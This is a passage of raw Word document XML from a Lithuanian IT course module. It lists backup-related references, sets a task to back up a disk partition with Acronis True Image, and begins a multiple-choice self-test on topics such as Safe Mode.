      <w:r w:rsidR="46A0A8B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ServerSpace. </w:t>
      </w:r>
      <w:r w:rsidR="11A03A2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="66FAD8A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://serverspace.us/support/help/use-rsync-to-create-a-backup-on-centos-8/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51426648" w14:textId="4250EC21" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="2F3BF74C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Best backup option. </w:t>
      </w:r>
      <w:r w:rsidR="1434C61F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CentOS The Community ENTerprise Operating System</w:t>
      </w:r>
      <w:r w:rsidR="3D2E0E7F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="1434C61F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: h</w:t>
      </w:r>
      <w:r w:rsidR="66FAD8A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ttps://forums.centos.org/viewtopic.php?t=61787</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0171C77D" w14:textId="77777777" w:rsidR="00B35968" w:rsidRPr="005A5C28" w:rsidRDefault="00B35968" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07178273" w14:textId="102F7CCB" w:rsidR="6D31194F" w:rsidRPr="005A5C28" w:rsidRDefault="5AEA392A"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1</w:t>
      </w:r>
      <w:r w:rsidR="5938F4ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="732C9239" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0E2AB21B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="0E2AB21B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASINAUDOJANT PROGRAMINE ĮRANGA,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SKIRTA DUOMENŲ KOPIJŲ KŪRIMUI, </w:t>
      </w:r>
      <w:r w:rsidR="0E2AB21B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ</w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0E2AB21B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DCD76" w14:textId="0F736E87" w:rsidR="104A5559" w:rsidRPr="005A5C28" w:rsidRDefault="1F508217" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="003D6709" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>audo</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>damiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis True Image </w:t>
      </w:r>
      <w:r w:rsidR="4046FDF7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>arba analogišk</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="4046FDF7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>programin</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrang</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sukur</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="48EA387C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pasirinkto</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> disko</w:t>
      </w:r>
      <w:r w:rsidR="5E5BD586" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> skirsnio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų kopij</w:t>
      </w:r>
      <w:r w:rsidR="003D6709" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4E4DC" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A8CBDC" w14:textId="4012654C" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="2D4BBD52" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B44420D" w14:textId="3B02B7FE" w:rsidR="001F1AC6" w:rsidRPr="005A5C28" w:rsidRDefault="79854FE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis True Image 2021. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="647A55E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidR="647A55E9" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="090693A6" w14:textId="6077494F" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1128116B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis True Image 2021: how to back up entire computer. </w:t>
      </w:r>
      <w:r w:rsidR="14B6CF21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, gruodžio 11). </w:t>
      </w:r>
      <w:r w:rsidR="3D2E0E7F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidR="3D2E0E7F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="3D2E0E7F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r w:rsidR="2D4BBD52" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/65468</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C949918" w14:textId="5CF556B8" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1D9DA5BE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis True Image 2019: how to back up files or disks. </w:t>
      </w:r>
      <w:r w:rsidR="0ED68618" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2019, gruodžio 30</w:t>
      </w:r>
      <w:r w:rsidR="4D772D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="4D772D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidR="4D772D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="4D772D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="4D772D14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/61645</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E66C0D0" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="05D8FF6A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis True Image 2020 Review &amp; Tutorial. </w:t>
      </w:r>
      <w:r w:rsidR="4E0F74DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, gegužės 22). </w:t>
      </w:r>
      <w:r w:rsidR="5167D1B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AskMe4Tecn</w:t>
      </w:r>
      <w:r w:rsidR="47DF8F94" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="47DF8F94" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D39E4" w14:textId="6D317BC9" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="47DF8F94" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidR="0F0269F9" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://askme4tech.com/acronis-true-image-2020-review-tutorial</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F5FB197" w14:textId="506A6BF9" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="3B95156D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79178232" w14:textId="2C165B36" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESTAS</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, SKIRTAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ĮSIVERTINTI MODULIO TEORINIŲ ŽINIŲ GEBĖ</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JIMUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B60416" w14:textId="77777777" w:rsidR="006670B4" w:rsidRPr="005A5C28" w:rsidRDefault="006670B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694A6B83" w14:textId="46146A8C" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="00407DA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="1A26E465" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Užbaikite sakinį: </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SafeMode – tai...</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC645A" w14:textId="3D440C0F" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="649331F0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>saugusis diagnostikos režimas, skirtas operacinės sistemos diagnostikai</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCA1A8" w14:textId="768F74B0" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="00FE1942" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="649331F0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ežimas</w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="649331F0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skirtas OS atnaujinimui</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341F0E3" w14:textId="787C6A96" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="649331F0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
